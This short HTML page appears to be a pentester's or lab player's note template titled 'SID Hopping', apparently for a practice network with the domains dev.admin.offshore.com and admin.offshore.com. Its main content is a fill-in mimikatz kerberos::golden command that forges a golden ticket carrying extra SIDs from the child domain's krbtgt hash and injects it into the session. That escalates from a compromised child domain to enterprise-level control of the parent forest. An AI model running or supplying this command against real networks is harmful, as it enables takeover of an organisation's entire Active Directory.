<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>SID Hopping</title>
</head><body><b><u>Sid Hopping Template<br/>
<br/>
<br/>
</u></b>target domain: admin.offshore.com<br/>
<br/>
current (child) domain: dev.admin.offshore.com<br/>
<br/>
child domain sid:<br/>
<br/>
Command for SID Hopping Golden Ticket:<br/>
<u><b><br/>
</b></u>mimikatz kerberos::golden /user:&lt;any user&gt; /domain:&lt;child domain&gt; /sid:&lt;child domain sid&gt; /sids:&lt;sids of enterprise domains in parent&gt; /krbtgt:&lt;krbtgt hash of child&gt; /ptt</body></html>